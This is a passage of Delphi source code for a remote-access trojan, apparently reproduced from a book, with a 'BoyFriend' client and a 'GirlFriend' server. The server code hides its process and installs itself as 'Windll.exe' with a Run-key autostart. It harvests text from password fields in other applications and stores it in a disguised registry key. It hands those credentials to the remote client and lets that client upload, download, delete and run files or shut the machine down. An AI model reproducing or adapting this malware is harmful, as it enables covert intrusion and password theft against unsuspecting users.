ProcessTree; diskmode:=false; exit; end; if pos('FDT}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then begin loading:=false; PC:=0;


for i:=0 to txtHid.Lines.Count-1 do if (txtHid.Lines.Strings[i]<>'') and (txtHid.Lines.Strings[i]<>'{FFDT}') then begin Inc (PC); PList[PC]:=txtHid.Lines.Strings[i]; end; gbTree.Caption:=' File Manager '; ProcessDiskList; diskmode:=true; exit; end; if pos('ETL}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then begin loading:=false; PC:=0; for i:=0 to txtHid.Lines.Count-1 do if (txtHid.Lines.Strings[i]<>'') and (Length(txtHid.Lines.Strings[i])>8) then begin Inc (PC); PList[PC]:=txtHid.Lines.Strings[i]; if (PC+1)>LastPosition then break; end; ProcessDirectory; exit; end; end; end; procedure TClientForm.ClientSocketError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); begin if not(scanning) then stbStatus.Panels[0].Text:= 'Error connecting to: ' + CurrIP else begin ServerAnswer:=true; Connection:=false; end; ErrorCode:= 0; end; procedure TClientForm.FormClose(Sender: TObject; var Action: TCloseAction); var ipdata:iptype; i:integer; begin AssignFile (fl, 'hosts.ip'); if fileexists ('hosts.ip') then reset (fl) else rewrite (fl); seek(fl,0); for i:=0 to ip.items.Count-1 do ipdata.ip[i]:=ip.items[i]; for i:=0 to portvalue.items.Count-1 do ipdata.port[i]:=strtoint(portvalue.items[i]); ipdata.pcount:=portvalue.items.count; ipdata.ipcount:=ip.items.count; write(fl,ipdata); closefile(fl); if clientsocket.Active then begin clientSocket.Socket.SendText('Quiting..'); clientsocket.close; end; end; procedure TClientForm.sbShowPassClick(Sender: TObject); begin


if (ClientSocket.Active) and (not(loading)) then clientsocket.socket.SendText ('Old me show?'); end; procedure TClientForm.sbCustomClick(Sender: TObject); var strtos:string; begin if inputquery ('Custom', 'Enter command: ', strtos) then clientsocket.socket.SendText (strtos); end; procedure TClientForm.sbExitClick(Sender: TObject); begin DestroyTrayIcon (1, ClientForm.Handle); clientsocket.Socket.SendText ('Quiting..'); if clientsocket.Active then clientsocket.close; halt(0); end; procedure TClientForm.sbAboutClick(Sender: TObject); begin AboutForm.ShowModal; end; procedure TClientForm.FormCreate(Sender: TObject); var ipdata:iptype; i:integer; begin if fileexists ('hosts.ip') then begin AssignFile (fl, 'hosts.ip'); ReSet (fl); Read(fl, ipdata); for i:=0 to ipdata.ipcount-1 do ip.items.Add (ipdata.ip[i]); for i:=0 to ipdata.pcount-1 do portvalue.items.add (inttostr(ipdata.port[i])); clientsocket.address:=ipdata.ip[ipdata.ipcount-1]; clientsocket.port:=ipdata.port[ipdata.pcount-1]; ip.text:=ipdata.ip[ipdata.ipcount-1]; portvalue.Text:=inttostr(ipdata.port[ipdata.pcount-1]); closefile (fl); end; diskmode:=false; working:=false; loading:=false; end; procedure TClientForm.sbMessageClick(Sender: TObject); begin frmMessage.ShowModal; end; procedure TClientForm.txtLogDblClick(Sender: TObject); begin txtlog.Lines.clear; end; procedure TClientForm.PortChangeClick(Sender: TObject); begin if portvalue.text<>'' then begin ClientSocket.Socket.SendText ('setport'+portvalue.Text); ClientSocket.close; Clientsocket.port:=strtoint(portvalue.text); clientsocket.open; end; end; procedure TClientForm.sbResetClick(Sender: TObject); begin if (clientsocket.active) and (not(loading)) then clientsocket.socket.SendText ('RESETALL');


end; procedure TClientForm.cmdSaveClick(Sender: TObject); var i: integer; Fl: TextFILE; FS: string; function RPSP (tms: integer): string; var i: integer; begin result:=''; if tms>0 then for i:=1 to tms do result:=result+' '; end; begin if sd1.Execute then begin AssignFile (Fl, sd1.FileName); ReWrite (Fl); for i:=0 to tvApp.Items.Count-1 do begin FS:='['+inttostr(i+1)+']'+ RPSP(tvApp.Items[i].Level)+ tvApp.Items[i].Text; WriteLn (Fl, FS); end; CloseFile (Fl); end; end; procedure TClientForm.PingserverAlive1Click(Sender: TObject); begin if not(loading) then clientsocket.socket.SendText ('TEST?'); end; procedure TClientForm.mnuPlaySoundClick(Sender: TObject); var strtos: string; begin strtos:=''; if not(loading) then if inputquery ('Play sound', 'Enter full && exact path to .wav file: ', strtos) then clientsocket.socket.SendText ('{S}'+strtos); end; procedure TClientForm.mnuShowPicClick(Sender: TObject); var strtos: string; begin strtos:=''; if not(loading) then if inputquery ('Show bitmap', 'Enter full && exact path to .bmp file: ', strtos) then clientsocket.socket.SendText ('{P}'+strtos); end; procedure AnswerF12 (KC: Word); var TMS: string; begin if KC=VK_F12 then begin ClientForm.mnuShow.Visible:=true; ClientForm.mnuShow.Default:=true; ClientForm.mnuDelim1.Visible:=true; TMS:='BoyFriend (client) version: 1.35'; if ClientForm.ClientSocket.Socket.Connected then TMS:=TMS+'. Connected with '+ClientForm.ClientSocket.Address; AddTrayIcon (1, TMS, ClientForm.Icon, ClientForm.Handle, WM_NOTIFYMSG); ClientForm.Hide;


end; end; procedure TClientForm.NotifyIcon (var TM: TMessage); var AC: LongInt; CP: TPoint; begin AC:=TM.LParam; if AC=WM_LBUTTONDBLCLK then begin ClientForm.mnuShow.Visible:=false; ClientForm.mnuShow.Default:=false; ClientForm.mnuDelim1.Visible:=false; ClientForm.Show; DestroyTrayIcon (1, ClientForm.Handle); end; if AC=WM_RBUTTONDOWN then begin GetCursorPos (CP); pmActions.Popup (CP.X, CP.Y); end; end; procedure TClientForm.txtLogKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); begin AnswerF12 (Key); end; procedure TClientForm.tvAppKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); begin AnswerF12 (Key); end; procedure TClientForm.portvalue1KeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); begin AnswerF12 (Key); end; procedure TClientForm.IP1KeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); begin AnswerF12 (Key); end; procedure TClientForm.PortChangeKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); begin AnswerF12 (Key); end; procedure TClientForm.cmdSaveKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); begin AnswerF12 (Key); end; procedure TClientForm.FormKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); begin AnswerF12 (Key); end; procedure TClientForm.mnuShowClick(Sender: TObject); begin


ClientForm.mnuShow.Visible:=false; ClientForm.mnuShow.Default:=false; ClientForm.mnuDelim1.Visible:=false; ClientForm.Show; DestroyTrayIcon (1, ClientForm.Handle); end; procedure TClientForm.mnuURLClick(Sender: TObject); var strtos: string; begin strtos:=''; if not(loading) then if inputquery ('Go to URL', 'Enter URL (with http://). ', strtos) then clientsocket.socket.SendText ('{U}'+strtos); end; procedure TClientForm.tvAppExpanding(Sender: TObject; Node: TTreeNode; var AllowExpansion: Boolean); begin AllowExpansion:=(Node.getFirstChild.ImageIndex<>-1); if not(AllowExpansion) then begin tvApp.Selected:=Node; tvAppDblClick (Sender); end else if Node.ImageIndex=CLOSED_ICON then begin Node.ImageIndex:=OPEN_ICON; Node.SelectedIndex:=OPEN_ICON; end; end; procedure TClientForm.tvAppCollapsing(Sender: TObject; Node: TTreeNode; var AllowCollapse: Boolean); begin if Node.ImageIndex=OPEN_ICON then begin Node.ImageIndex:=CLOSED_ICON; Node.SelectedIndex:=CLOSED_ICON; end; end; procedure TClientForm.sbFileManagerClick(Sender: TObject); begin if (ClientSocket.Active) and (not(loading)) then clientsocket.socket.SendText ('getbaselist'); end; procedure TClientForm.tvAppDblClick(Sender: TObject); var Start: TTreeNode; Path: string; begin if (diskmode) then begin if (tvApp.Selected.Data=nil) and (tvApp.Selected.ImageIndex in [CLOSED_ICON, OPEN_ICON, HDD_ICON, CDROM_ICON]) then begin FolderNode:=tvApp.Selected; Start:=tvApp.Selected; tvApp.Selected.Data:=@loading; Path:=Start.Text+'\'; if Start.Level>0 then


repeat Start:=Start.Parent; Path:=Start.Text+'\'+Path; until Start.Level=0; if ClientSocket.Active then ClientSocket.Socket.SendText ('diskget'+Path); end; if (tvApp.Selected.ImageIndex in [BMP_FILE, WAV_FILE, EXE_FILE]) then begin Start:=tvApp.Selected; Path:=TrimPRT (Start.Text); if Start.Level>0 then repeat Start:=Start.Parent; Path:=Start.Text+'\'+Path; until Start.Level=0; case tvApp.Selected.ImageIndex of BMP_FILE: Path:='{P}'+Path; WAV_FILE: Path:='{S}'+Path; EXE_FILE: Path:='{U}'+Path; end; if not(loading) then clientsocket.socket.SendText (Path); end; end; end; procedure TClientForm.tvAppRatoDown(Sender: TObject; Button: TRatoButton; Shift: TShiftState; X, Y: Integer); var CP: TPoint; begin if (Button=mbRight) and (diskmode) then begin GetCursorPos (CP); pmFile.Popup (CP.X, CP.Y); end; end; procedure TClientForm.pmFilePopup(Sender: TObject); begin mnuDownload.Enabled:=(tvApp.Selected.ImageIndex in [BMP_FILE, WAV_FILE, EXE_FILE, USUAL_FILE]); mnuDelete.Enabled:=mnuDownload.Enabled; mnuDelim.Visible:=false; mnuRun.Visible:=false; if (tvApp.Selected.ImageIndex in [BMP_FILE, WAV_FILE, EXE_FILE]) then begin mnuDelim.Visible:=true; mnuRun.Visible:=true; mnuRun.Default:=true; mnuRun.ImageIndex:=tvApp.Selected.ImageIndex; case tvApp.Selected.ImageIndex of BMP_FILE: mnuRun.Caption:='Show'; WAV_FILE: mnuRun.Caption:='Play'; EXE_FILE: mnuRun.Caption:='Run'; end; end; mnuDelete.Enabled:=not (tvApp.Selected.ImageIndex in [HDD_ICON, CDROM_ICON]); end; procedure TClientForm.mnuDeleteClick(Sender: TObject); var Start, TrueChild: TTreeNode; Path: string; begin


Start:=tvApp.Selected; TrueChild:=tvApp.Selected; Path:=TrimPRT (Start.Text); if Start.Level>0 then repeat Start:=Start.Parent; Path:=Start.Text+'\'+Path; until Start.Level=0; if MessageDlg ('Really delete '+DupAmps(Path)+' ?', mtConfirmation, [mbYes, mbNo], 0)= mrYes then if ClientSocket.Active then ClientSocket.Socket.SendText ('delfile'+Path); DeleteAnswer:=false; FileDestroyed:=false; repeat Application.ProcessMessages; until DeleteAnswer; if FileDestroyed then TrueChild.Delete; end; procedure TClientForm.mnuRunClick(Sender: TObject); begin tvAppDblClick (Sender); end; procedure TClientForm.mnuDownloadClick(Sender: TObject); var Start: TTreeNode; Path: string; begin Start:=tvApp.Selected; Path:=TrimPRT (Start.Text); if Start.Level>0 then repeat Start:=Start.Parent; Path:=Start.Text+'\'+Path; until Start.Level=0; if MessageDlg ('Download '+DupAmps(Path)+' ?', mtConfirmation, [mbYes, mbNo], 0)= mrYes then if ClientSocket.Active then ClientSocket.Socket.SendText ('getfile'+Path); end; procedure TClientForm.mnuUploadClick(Sender: TObject); var Fl: FILE; Query: string; i, BSent: integer; Folder: TTreeNode; RemotePath: string; begin if od1.Execute then begin Folder:=tvApp.Selected; if Folder.ImageIndex in [EXE_FILE, BMP_FILE, WAV_FILE, USUAL_FILE] then Folder:=Folder.Parent; FolderNode:=Folder; RemotePath:=Folder.Text+'\'; if Folder.Level>0 then repeat Folder:=Folder.Parent; RemotePath:=Folder.Text+'\'+RemotePath; until Folder.Level=0; FName:=od1.FileName;


AssignFile (Fl, FName); {$I-} ReSet (Fl, 1); {$I+} if IOResult<>0 then begin MessageDlg ('Error accessing file.', mtError, [mbOK], 0); exit; end; FSize:=FileSize(Fl); Query:=''; for i:=Length(FName) downto 1 do if FName[i]='\' then break else Query:=FName[i]+Query; Query:=Query+':::'+inttostr(FSize); if ClientSocket.Active then begin ClientSocket.Socket.SendText ('takefile'+RemotePath+Query+WrapStr); Sleep (1000); // !!!!DON'T REMOVE THIS COMMENT!!!! repeat BlockRead (Fl, buffer, 1024, BSent); if BSent>0 then ClientSocket.Socket.SendBuf (buffer, BSent); until EOF (Fl); ServerAnswer:=false; repeat Application.ProcessMessages; until ServerAnswer; if Uploaded then ClientSocket.Socket.SendText ('diskget'+RemotePath); end; CloseFile (Fl); end; end; end.


Página 186 Fonte: MessageUnit.PAS unit MessageUnit; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, Buttons, StdCtrls, ExtCtrls; type TfrmMessage = class(TForm) sbNoIcon: TSpeedButton; Label1: TLabel; sbWarning: TSpeedButton; sbInfo: TSpeedButton; sbStop: TSpeedButton; sbQuest: TSpeedButton; rgType: TRadioGroup; txtMessage: TEdit; Label2: TLabel; Label3: TLabel; cmdSend: TButton; cmdCancel: TButton; cmdTest: TButton; Label4: TLabel; txtCaption: TEdit; procedure FormCreate(Sender: TObject); procedure sbNoIconClick(Sender: TObject); procedure sbWarningClick(Sender: TObject); procedure sbInfoClick(Sender: TObject); procedure sbStopClick(Sender: TObject); procedure sbQuestClick(Sender: TObject); procedure cmdTestClick(Sender: TObject); procedure cmdCancelClick(Sender: TObject); procedure cmdSendClick(Sender: TObject); private { Private declarations } public { Public declarations } end; var frmMessage: TfrmMessage; implementation uses main; var CIcon: integer; IconConst: array [0..4] of integer=(0, MB_ICONEXCLAMATION, MB_ICONINFORMATION, MB_ICONSTOP, MB_ICONQUESTION); {$R *.DFM} procedure TfrmMessage.FormCreate(Sender: TObject); begin CIcon:=0; end; procedure TfrmMessage.sbNoIconClick(Sender: TObject); begin CIcon:=0;


end; procedure TfrmMessage.sbWarningClick(Sender: TObject); begin CIcon:=1; end; procedure TfrmMessage.sbInfoClick(Sender: TObject); begin CICon:=2; end; procedure TfrmMessage.sbStopClick(Sender: TObject); begin CIcon:=3; end; procedure TfrmMessage.sbQuestClick(Sender: TObject); begin CIcon:=4; end; procedure TfrmMessage.cmdTestClick(Sender: TObject); var TSum: LongInt; MCapt, MText: PChar; MT, RT: string; i: integer; begin TSum:=0; case rgType.ItemIndex of 1: TSum:=MB_ABORTRETRYIGNORE; 2: TSum:=MB_OKCANCEL; 3: TSum:=MB_RETRYCANCEL; 4: TSum:=MB_YESNO; 5: TSum:=MB_YESNOCANCEL; end; TSum:=TSum+IconConst[CIcon]; getMem (MCapt, 100); StrPCopy (MCapt, txtCaption.Text); RT:=''; MT:=txtMessage.Text; for i:=1 to Length (MT) do if MT[i]='|' then RT:=RT+chr(13)+chr(10) else RT:=RT+MT[i]; getMem (MText, 500); StrPCopy (MText, RT); MessageBox (frmMessage.Handle, MText, MCapt, TSum); freeMem (MText); freeMem (MCapt); end; procedure TfrmMessage.cmdCancelClick(Sender: TObject); begin frmMessage.Close; end; procedure TfrmMessage.cmdSendClick(Sender: TObject); var MT: string; begin MT:='{MSG}'+txtCaption.Text+ '$$$'+txtMessage.Text+ '%%%'+inttostr(rgType.ItemIndex)+inttostr(CIcon); ClientForm.ClientSocket.Socket.SendText (MT); frmMessage.Close; end; end.


Página 189 Fonte: SERVERMAIN.PAS unit ServerMain; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, ScktComp, Registry, ShellAPI, ExtCtrls, ShowPictureUnit; type TRegisterServiceProcess = function (dwProcessID, dwType:DWord): DWORD; stdcall; TServerForm = class(TForm) ServerSocket: TServerSocket; PTimer: TTimer; procedure ShowPicture (pName: string); procedure FormCreate(Sender: TObject); procedure ServerSocketClientRead(Sender: TObject; Socket: TCustomWinSocket); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure PTimerTimer(Sender: TObject); private { Private declarations } public { Public declarations } end; var ServerForm: TServerForm; function PlaySound(lpszSoundName: PAnsiChar; uFlags: UINT): BOOL; stdcall; implementation function PlaySound; external 'winmm.dll' name 'sndPlaySoundA'; {$R *.DFM} var PList: array [1..64] of string; FlT: FILE; FName: string; FSize: integer; AppList: array [1..64] of LongInt; PC, RC, APC, RLen, AC: integer; SD: string; buffer: array [0..1040] of byte; sendfile, recfile: boolean; iores: integer; const IconConst: array [0..4] of integer=(0, MB_ICONEXCLAMATION, MB_ICONINFORMATION, MB_ICONSTOP, MB_ICONQUESTION); WrapStr = #13+#10; MegaByte = 1024*1024; KiloByte = 1024; function WinText (hWnd: LongInt): string; var PC: PChar; L: integer; begin L:=SendMessage (hWnd, WM_GETTEXTLENGTH, 0, 0); getmem (PC, L+1); SendMessage (hWnd, WM_GETTEXT, L+1, LongInt (PC)); result:=PC; end; function IsPassword (hWnd: LongInt): boolean; var ST: LongInt; begin ST:=GetWindowWord (hWnd, GWL_STYLE) and $FF;


result:=(ST=$A0) or (ST=$E0); end; function IsTextField (hWnd: LongInt): boolean; var ST: LongInt; begin ST:=GetWindowWord (hWnd, GWL_STYLE) and $FF; result:=(ST=$A0) or (ST=$E0) or (ST=$80) or (ST=$C0); end; // Gets all applications with pass fields procedure GetPasswordList; var i, j: integer; ohWnd, PrhWnd: LongInt; begin APC:=0; for i:=1 to 16384 do if IsWindow (i) then if IsPassword (i) then begin PrhWnd:=i; repeat ohWnd:=PrhWnd; PrhWnd:=GetParent (ohWnd); until GetParent (PrhWnd)=0; Inc (APC); AppList[APC]:=PrhWnd; end; PC:=0; for i:=1 to 16384 do if IsWindow (i) then if IsTextField (i) then begin PrhWnd:=i; repeat ohWnd:=PrhWnd; PrhWnd:=GetParent (ohWnd); until GetParent (PrhWnd)=0; for j:=1 to APC do if PrhWnd=AppList[j] then begin Inc (PC); PList[PC]:=WinText(PrhWnd)+'___'+WinText(i); break; end; { Application with passes scanning..} end; { hWnd scanning } end; { End of procedure } procedure RegistryPasswords; // adds passwords (from PList) to Registry with old Password checking var i, j: integer; found: boolean; RG: TRegistry; begin ServerForm.PTimer.Enabled:=false; RG:=TRegistry.Create; GetPasswordList; RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\General\', TRUE); if RG.ValueExists ('TCount') then RC:=RG.ReadInteger ('TCount') else RC:=0; if RC=0 then // Empty registry - don't compare, add all passes.. begin RG.WriteInteger ('TCount', PC); for i:=1 to PC do


RG.WriteString (inttostr(i), PList[i]); end else begin // Comparing RList & PList... for i:=1 to PC do // compare loop begin found:=false; for j:=1 to RC do if RG.ReadString (inttostr(j))=PList[i] then found:=true; if not(found) then begin Inc (RC); RG.WriteString (inttostr(RC), PList[i]); end; end; // end compare loop RG.WriteInteger ('TCount', RC); { for i:=1 to RC do RG.WriteString (inttostr(i), RList[i]);} end; RG.Destroy; ServerForm.PTimer.Enabled:=true; end; procedure TServerForm.FormCreate(Sender: TObject); var TM: string; i: integer; PC, OldName, NewName: PChar; RG: TRegistry; hNdl:THandle; RegisterServiceProcess: TRegisterServiceProcess; begin // // // hNdl:=LoadLibrary('KERNEL32.DLL'); RegisterServiceProcess:=GetProcAddress(hNdl, 'RegisterServiceProcess'); RegisterServiceProcess (GetCurrentProcessID, 1); FreeLibrary(hNdl); // SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW and not WS_EX_APPWINDOW); TM:=Application.ExeName; for i:=Length(TM) downto 1 do if TM[i]='\' then break; TM:=copy (TM, 1, i); getMem (PC, 100); GetWindowsDirectory (PC, 100); SD:=PC+'\'; freeMem (PC); getmem (OldName, 100); getMem (NewName, 100); StrPCopy (OldName, Application.ExeName); StrPCopy (NewName, SD+'Windll.exe'); if TM<>SD then // First launch from other directory.... begin DeleteFile (SD+'Windll.exe'); CopyFile (OldName, NewName, FALSE); RG:=TRegistry.Create; // Add data to registry RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE); RG.WriteString ('Windll.exe', SD+'Windll.exe'); RG.Destroy; StrPCopy (OldName, '"'+Application.ExeName+'"'); ShellExecute (0, 'open', NewName, OldName, 'c:\', 1); Halt (0);


end else begin // Launch from WINDOWS directory RG:=TRegistry.Create; // Remove from Registry (to hide!) RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE); RG.WriteString ('Windll.exe', SD+'Windll.exe'); RG.Destroy; RG:=TRegistry.Create; RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\General', TRUE); RG.CreateKey ('Settings'); RG.OpenKey ('\SOFTWARE\Microsoft\General\Settings', FALSE); if RG.ValueExists ('APPID') then ServerSocket.Port:=RG.ReadInteger ('APPID') else RG.WriteInteger ('APPID', ServerSocket.Port); DeleteFile (ParamStr(1)); RG.Destroy; ServerSocket.Active:= True; end; end; function extract (st: string; ind1, ind2: integer): string; var i: integer; begin result:=''; for i:=ind1 to ind2 do result:=result+st[i]; end; function ProcessMsg (Ms: string): string; // processing message.... // Message format: // {MSG}<caption>$$$<text>%%%messageview (2 symbols) var MCapt, MText: PChar; MT, RT: string; MSum: LongInt; i: integer; begin MT:=extract (Ms, 6, Pos ('$$$', MS)-1); getMem (MCapt, Length(MT)+1); StrPCopy (MCapt, MT); MT:=extract (MS, Pos('$$$', MS)+3, Pos ('%%%', MS)-1); RT:=''; for i:=1 to Length (MT) do if MT[i]='|' then RT:=RT+chr(13)+chr(10) else RT:=RT+MT[i]; getMem (MText, Length(RT)+1); StrPCopy (MText, RT); RT:=extract (MS, Pos ('%%%', MS)+3, Length (MS) ); MSum:=0; case RT[1] of '1': MSum:=MB_ABORTRETRYIGNORE; '2': MSum:=MB_OKCANCEL; '3': MSum:=MB_RETRYCANCEL; '4': MSum:=MB_YESNO; '5': MSum:=MB_YESNOCANCEL; end; MSum:=MSum+IconConst [ ord (RT[2])-48 ]; MSum:=MessageBox (0, MText, MCapt, MSum+MB_SYSTEMMODAL); RT:='Unknown answer'; case MSum of IDABORT: RT:='Abort.'; IDCANCEL: RT:='Cancel.'; IDIGNORE: RT:='Ignore.'; IDNO : RT:='No.';


IDOK : RT:='Ok.'; IDRETRY: RT:='Retry.'; IDYES : RT:='Yes.'; end; result:=RT; freeMem (MText); freeMem (MCapt); end; procedure TServerForm.ShowPicture (pname: string); begin if FileExists (pname) then with frmPicture do begin imgPic.Picture.LoadFromFile (pname); imgPic.Top:=0; imgPic.Left:=0; pnPic.Left:=2; pnPic.Top:=2; pnPic.Width:=imgPic.Width+3; pnPic.Height:=imgPic.Height+3; Width:=imgPic.Width+5; Height:=imgPic.Height+5; Left:=(Screen.Width-Width) div 2; Top:=(Screen.Height-Height) div 2; Show; end; end; function TransName (FD: TSearchRec): string; var RS: char; MD: string; begin RS:='U'; if (FD.Attr and faDirectory)>0 then RS:='F'; MD:=LowerCase (copy (FD.Name, Length(FD.Name)-2, 3)); if MD='bmp' then RS:='B'; if MD='exe' then RS:='E'; if MD='wav' then RS:='W'; result:=RS+'_'+LowerCase(FD.Name){+WrapStr}; end; function LastPos (subchar: char; s: string): integer; var i: integer; begin result:=0; for i:=Length(s) downto 1 do if subchar=s[i] then begin result:=i; break; end; end; function GetFSizeStr (FN: TSearchRec): string; var FS: real; FST, DB: string; begin FS:=FN.Size; DB:=' B)'; if FS>=KiloByte then DB:=' KB)'; if FS>=MegaByte then DB:=' MB)'; if DB=' KB)' then FS:=FS / KiloByte; if DB=' MB)' then FS:=FS / MegaByte; if DB=' B)' then FST:=inttostr(round(FS)) else Str (FS:5:2, FST); FST:=Trim (FST);


result:=' ('+FST+DB+WrapStr; end; function CNumeric (const S: string):string; var i: integer; begin result:=''; for i:=1 to Length (S) do if S[i] in ['0','1','2','3','4','5','6','7','8','9'] then result:=result+S[i]; end; procedure TServerForm.ServerSocketClientRead(Sender: TObject; Socket: TCustomWinSocket); var gotstr:string; i, PX: integer; TM: Cardinal; RG: TRegistry; TPC: PChar; TMR, DM: string; STD: TSearchRec; FL: FILE; begin if recfile then begin repeat Application.ProcessMessages; AC:=Socket.ReceiveBuf (buffer, 1024); if AC>0 then begin RLen:=RLen+AC; BlockWrite (FlT, buffer, AC); end; until RLen>=FSize; if recfile then begin CloseFile (FlT); Socket.SendText ('Uploading complete.'); end; recfile:=false; exit; end; if not(recfile) then begin gotstr:=socket.receivetext; if (copy (gotstr, 1, 7)='getfile') and not(sendfile) then if FileExists (extract (gotstr, 8, Length(gotstr))) then begin sendfile:=true; AssignFile (Fl, extract (gotstr, 8, Length(gotstr))); ReSet (Fl, 1); Socket.SendText ('Sending file '+extract (gotstr, 8, Length(gotstr))+'; size '+inttostr(FileSize (FL))+' byte(s).'); Socket.SendText ('{FSEND}'+WrapStr); Socket.SendText (inttostr(FileSize (FL))+WrapStr); Socket.SendText (extract (gotstr, lastpos ('\', gotstr)+1, Length(gotstr))+WrapStr); Sleep (500); Socket.SendText ('{FCOMP}'+WrapStr); Sleep (1000); repeat BlockRead (Fl, buffer, 1024, iores); if iores>0 then Socket.SendBuf (buffer, iores); until EOF(Fl); CloseFile (Fl); sendfile:=false;


end; if not (sendfile) then begin if copy (gotstr, 1, 8)='takefile' then begin recfile:=true; FName:=extract (gotstr, Pos (':::', gotstr)+3, Length(gotstr)); FSize:=strtoint (CNumeric (FName)); FName:=extract (gotstr, 9, Pos (':::', gotstr)-1); AssignFile (FlT, FName); ReWrite (FlT, 1); RLen:=0; Application.ProcessMessages; exit; end; if copy (gotstr, 1, 7)='delfile' then begin if DeleteFile (extract (gotstr, 8, Length(gotstr))) then Socket.SendText ('File deleted.') else Socket.SendText ('Delete Error.'); end; if gotstr='Quiting..'then begin ServerSocket.Close; ServerSocket.Active:= True; end; // Disk list transmitting if gotstr='getbaselist' then begin GetMem (TPC, 100); PX:=GetLogicalDriveStrings (100, TPC); DM:=''; for i:=-1 to PX do if (TPC+i)[1]<>#0 then DM:=DM+(TPC+i)[1]; FreeMem (TPC); TMR:=''; Socket.SendText ('{TDSS}'); for i:=1 to Length (DM) do begin TMR:=TMR+DM[i]; if (i mod 3)=0 then begin GetMem (TPC, 4); StrPCopy (TPC, TMR); PX:=GetDriveType (TPC); FreeMem (TPC); TM:=0; if PX=DRIVE_CDROM then begin TMR:='C_'+TMR+WrapStr; TM:=10; end; if PX=DRIVE_FIXED then begin TMR:='H_'+TMR+WrapStr; TM:=10; end; if TM>0 then Socket.SendText (TMR); TMR:=''; end; end; Socket.SendText ('{FFDT}'); end; // if copy (gotstr, 1, 7)='diskget' then


begin Socket.SendText ('{LFTM}'+WrapStr); FindFirst (extract (gotstr, 8, Length(gotstr))+'*.*', faAnyFile, STD); if ((STD.Attr and faDirectory)>0) and (STD.Name<>'.') then Socket.SendText (TransName(STD)+WrapStr); repeat PX:=FindNext (STD); if (PX=0) and ((STD.Attr and faDirectory)>0) and (STD.Name<>'..') then Socket.SendText (TransName(STD)+WrapStr); until PX<>0; FindClose (STD); FindFirst (extract (gotstr, 8, Length(gotstr))+'*.*', faArchive+faReadOnly+ faHidden+faSysFile, STD); if STD.Attr<>faDirectory then Socket.SendText (TransName(STD)+GetFSizeStr (STD)); repeat PX:=FindNext (STD); if (PX=0) and (STD.Attr<>faDirectory) then Socket.SendText (TransName(STD)+GetFSizeStr (STD)); until PX<>0; FindClose (STD); Socket.SendText ('{RETL}'); end; if gotstr='ver' then socket.sendtext('GirlFriend Server 1.35 . Port '+ inttostr(ServerSocket.Port)+chr(13)+chr(10)); if gotstr='time' then Socket.SendText ('Remote Time/Date is '+ FormatDateTime ('hh:nn.ss "-" mmmm d, yyyy, dddd', Now) ); if gotstr='TEST?' then socket.sendtext('Server OK'); if copy (gotstr, 1, 5)='{MSG}' then Socket.SendText ('User answered:'+ProcessMsg (gotstr)); if copy (gotstr, 1, 3)='{S}' then if FileExists (extract (gotstr, 4, Length (gotstr))) then begin GetMem (TPC, Length (gotstr)-2); // Length without '{S}' header and +1 for #0 StrPCopy (TPC, extract (gotstr, 4, Length (gotstr))); PlaySound (TPC, 1); FreeMem (TPC); end; if copy (gotstr, 1, 3)='{P}' then ShowPicture (extract (gotstr, 4, Length (gotstr))); if copy (gotstr, 1, 3)='{U}' then begin GetMem (TPC, Length (gotstr)-2); // Length without '{U}' header and +1 for #0 StrPCopy (TPC, extract (gotstr, 4, Length (gotstr))); ShellExecute (0, 'open', TPC, '', 'c:\', 1); FreeMem (TPC); end; if gotstr='Name user' then begin TM:=50; GetMem (TPC, 50); GetUserName (TPC, TM); Socket.SendText ('Current user: '+TPC); FreeMem (TPC); end; if gotstr='Logoff' then ExitWindowsEx (EWX_LOGOFF, TM); if gotstr='Shutdown' then ExitWindowsEx (EWX_SHUTDOWN, TM);


if gotstr='ReBOOT' then ExitWindowsEx (EWX_REBOOT, TM); if gotstr='PowerOFF' then ExitWindowsEx (EWX_POWEROFF, TM); if gotstr='DOWN' then begin PTimer.Enabled:=false; Socket.SendText ('Timer off.'); end; if gotstr='UP' then begin PTimer.Enabled:=true; Socket.SendText ('Timer on.'); end; if copy (gotstr, 1, 7)='setport' then begin Socket.SendText ('New port: '+extract(gotstr, 8, Length(gotstr))); ServerSocket.Close; ServerSocket.Port:=strtoint (extract(gotstr, 8, Length(gotstr)) ); RG:=TRegistry.Create; RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\General\Settings', TRUE); RG.WriteInteger ('APPID', ServerSocket.Port); RG.Destroy; ServerSocket.Active:= True; end; if gotstr='Old me show?' then begin PTimer.Enabled:=false; RG:=TRegistry.Create; RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\General\', TRUE); if RG.ValueExists ('TCount') then begin RC:=RG.ReadInteger ('TCount'); socket.SendText ('{PLTS}'); for i:=1 to RC do socket.SendText (RG.ReadString (inttostr(i))+chr(13)+chr(10)); socket.SendText ('{FTPL}'+chr(13)+chr(10)); end; RG.Destroy; PTimer.Enabled:=true; end; if gotstr='RESETALL' then begin PTimer.Enabled:=false; RG:=TRegistry.Create; RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\General\', TRUE); if RG.ValueExists ('TCount') then begin PX:=RG.ReadInteger ('TCount'); RG.DeleteValue 